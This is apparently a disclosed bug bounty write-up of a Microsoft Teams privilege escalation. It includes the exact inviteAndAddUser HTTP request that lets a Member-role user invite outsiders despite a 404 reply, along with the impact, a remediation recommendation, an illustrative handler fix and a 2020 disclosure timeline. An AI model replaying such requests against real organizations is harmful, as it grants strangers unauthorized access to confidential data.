Privilege Escalation in Microsoft Teams

Vulnerability Description

While researching the Microsoft Teams web application (https://teams.microsoft.com/), which is part of the Microsoft Bug Bounty program (https://www.microsoft.com/en-us/msrc/bounty-microsoft-cloud?rtc=1), I found the issue described below. In today's situation Microsoft Teams is one of the leading platforms that organizations use to work remotely, which naturally brings it to the attention of a lot of malicious users/hackers looking for issues to exploit.

The Microsoft Teams application has three types of user roles: Owner, Member & Guest. Below is one of the capabilities in question, based on the official Teams documentation (https://support.microsoft.com/en-us/office/team-owner-member-and-guest-capabilities-in-teams-d03fdf5b-1a6e-48e4-8e07-b13e1350ec7b):

Team owner, member, and guest capabilities in Teams

Based on the above documentation, a "Member" role user cannot add or remove guests. Using the steps mentioned below, a Member role user was able to escalate privileges to one of the Owner role's functions: adding users to the Teams organization.

Risk Breakdown

  • Risk: High / Important

  • Difficulty to Exploit: Easy

Affected URLs

  • https://teams.microsoft.com/api/mt/part/amer-02/beta/teams/19:HASHID@thread.tacv2/ID/inviteAndAddUser

Steps to Reproduce

The following proof of concept is outlined in six (6) steps to reproduce the issue.

Step 1: Assume the Owner has added "memberrole@example.com" to the Team with the "Member" role.

Step 2: The Member role user logs in to teams.microsoft.com. It was observed that Member role users do not have the option to add Members or Guests.

Step 3: The Member role user copies their current Cookies, X-Skypetoken and Authorization: Bearer values and inserts them into the request below, which is the request for adding a new Member role user, captured from the Owner account for PoC purposes:

PUT /api/mt/part/amer-02/beta/teams/19:ID@thread.tacv2/ID-c2a5c50/inviteAndAddUser HTTP/1.1
Host: teams.microsoft.com
Connection: close
Content-Length: 106
x-ms-scenario-id: 393
x-ms-user-type: user
X-Client-UI-Language: en-us
x-ms-client-env: pckgsvc-prod-c2-asse-02
x-ms-client-type: web
X-Skypetoken: < Member Role Skype Token >
Authorization: Bearer < Member Role Authentication Bearer >
Content-Type: application/json
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
x-ms-client-version: 1415/1.0.0.2020061225
X-RingOverride: general
ConsistencyLevel: Organization;ScenarioId=signup
Origin: https://teams.microsoft.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Member Role Cookies

{"emailAddress":"attackersemail@example.com","displayName":"User-Added-by-Member-Role","userType":"Member"}

Here "attackersemail@example.com" is the new user that the malicious Member role user is trying to add.

Step 4: Sending the request above produces the following response:

HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Vary: Origin,Accept-Encoding
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://teams.microsoft.com
X-ServerRequestId: 5CB86FA204FE4E68AB9E6C5B34FA307D
X-MachineName: mtsvc00000I
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-MSEdge-Ref: Ref A: 5CB86FA204FE4E68AB9E6C5B34FA307D Ref B: HYD30EDGE0111 Ref C: 2020-06-29T16:04:18Z
Date: Mon, 29 Jun 2020 16:04:19 GMT
Connection: close
Content-Length: 131

{"errorCode":"UserNotFoundInSkypeTeam","message":"An unexpected error(Type = UserNotFoundInSkypeTeam) occurred. Please try again."}

Step 5: Ignoring the 404 Not Found response above and checking the inbox of attackersemail@example.com, it was found that the user still received the invitation to join the Team.

Step 6: The new user (attackersemail@example.com) invited by the Member role user now has access to the Teams organization without the Team Owner's permission.

Impact

  1. Using this vulnerability, the Member role user was able to escalate its access to the Owner-privileged functionality of adding new members to the Teams organization, breaking the business logic of the application and allowing anyone to see the organizational data in the Team's Channels.

  2. The severity of this issue is Critical / High, depending on what level of confidential data is being shared on the platform, because Member role users of the team can add new members to the Teams organization without the permission of the Teams Organization Owner.

Recommendation

Ensure that correct authorization checks are implemented for the functionalities listed in the https://support.microsoft.com/en-us/office/team-owner-member-and-guest-capabilities-in-teams-d03fdf5b-1a6e-48e4-8e07-b13e1350ec7b documentation.
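As an added illustration (not Microsoft's code; the handler names, role strings and the ordering of operations are assumptions), the model below shows one way an endpoint can return a 404 error yet still deliver the invitation: the side effect runs before the caller's role is verified. The fixed handler authorizes the caller on the server first, returns 403 for non-Owners, and only then sends the invitation.

```python
# Added example, not Microsoft's code: a minimal model of an "invite and add
# user" endpoint. The vulnerable variant performs the side effect (sending the
# invitation) before it verifies the caller's role, which is one way to produce
# the behaviour observed in the write-up: a 404 error body, yet the invitation
# still arrives. The fixed variant authorizes first and only then acts.
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

OWNER, MEMBER, GUEST = "Owner", "Member", "Guest"  # assumed role names


@dataclass
class Team:
    roles: Dict[str, str]                              # user -> role
    outbox: List[str] = field(default_factory=list)    # invitations "sent"


def send_invitation(team: Team, email: str) -> None:
    """Stand-in for the mail/notification side effect."""
    team.outbox.append(email)


def invite_and_add_user_vulnerable(team: Team, caller: str, body: dict) -> Tuple[int, dict]:
    # Assumed ordering for illustration: act first, look the caller up afterwards.
    send_invitation(team, body["emailAddress"])
    if team.roles.get(caller) != OWNER:
        return 404, {"errorCode": "UserNotFoundInSkypeTeam"}
    team.roles[body["emailAddress"]] = body.get("userType", MEMBER)
    return 200, {"status": "added"}


def invite_and_add_user_fixed(team: Team, caller: str, body: dict) -> Tuple[int, dict]:
    # Authorize from the caller's own identity before any side effect; hiding
    # the "add member" button in the UI is not an access control.
    role = team.roles.get(caller)
    if role is None:
        return 404, {"errorCode": "UserNotFoundInSkypeTeam"}
    if role != OWNER:
        return 403, {"errorCode": "Forbidden", "message": "Only owners may add users"}
    if body.get("userType", MEMBER) not in (MEMBER, GUEST):
        return 400, {"errorCode": "InvalidUserType"}
    send_invitation(team, body["emailAddress"])
    team.roles[body["emailAddress"]] = body.get("userType", MEMBER)
    return 200, {"status": "added"}


def demo(handler) -> Tuple[int, List[str]]:
    # Constructed sample team: one Owner and the Member from the write-up as caller.
    team = Team(roles={"owner@example.com": OWNER, "memberrole@example.com": MEMBER})
    body = {"emailAddress": "attackersemail@example.com",
            "displayName": "User-Added-by-Member-Role", "userType": "Member"}
    status, _ = handler(team, "memberrole@example.com", body)
    return status, team.outbox
```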

References

For more information on remediation steps check out reference [1].

Timelines 

  • June 30, 2020 - Case Opened
  • July 8, 2020 - Followed up
  • July 15, 2020 - August 11, 2020 - Multiple follow-ups on reproducing the issue & updates
  • August 22, 2020 - Issue confirmed -> Changed to Develop status
  • September 4, 2020 - In Scope / Bounty amount email

Follow me @vikzsharma on Twitter for updates on write-ups.
